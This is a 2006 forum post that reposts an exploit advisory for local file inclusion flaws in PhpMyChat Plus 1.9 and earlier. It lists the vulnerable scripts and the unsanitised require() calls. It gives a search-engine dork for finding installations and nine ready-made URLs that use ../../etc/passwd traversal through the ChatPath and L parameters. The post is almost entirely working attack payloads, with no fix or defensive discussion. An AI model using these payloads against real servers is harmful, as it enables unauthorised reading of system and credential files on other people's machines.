escalation666 Posted November 8, 2006 Report Posted November 8, 2006 a*******************************************************************************# Title : PhpMyChat Plus <= 1.9 Multiple Source Code Disclosure Vulnerabilities# Author : ajann# Dork : phpMyChat plus# Vuln;*******************************************************************************[Files]avatar.phpcolorhelp_popup.phpcolor_popup.phpindex.phpindex1.php/lib/connected_users.lib.php/lib/index.lib.phplogs.phpphpMyChat.php3[/Files][Code,1]connected_users.lib.php Error:......require("./${ChatPath}/lib/database/".C_DB_TYPE.".lib.php");require("./${ChatPath}/lib/clean.lib.php");......Key [:] ChatPath=[file]Key [:] ChatPath=[file]Key [:] ChatPath=[file]Key [:] ChatPath=[file]Key [:] ChatPath=[file]Key [:] ChatPath=[file]Key [:] ChatPath=[file]Key [:] L=[file]Key [:] ChatPath=[file]Example:http://target.com/path/avatar.php?ChatPath=../../etc/passwdhttp://target.com/path/colorhelp_popup.php?ChatPath=../../etc/passwdhttp://target.com/path/color_popup.php?ChatPath=../../etc/passwdhttp://target.com/path/index.php?ChatPath=../../etc/passwdhttp://target.com/path/lib/connected_users.lib.php?ChatPath=../../etc/passwdhttp://target.com/path/avatar.php?ChatPath=../../etc/passwdhttp://target.com/path/lib/index.lib.php?ChatPath=../../etc/passwdhttp://target.com/path/logs.php?L=../../etc/passwdhttp://target.com/path/phpMyChat.php3?ChatPath=../../etc/passwd# ajann,Turkey# ...# Im not Hacker! Quote
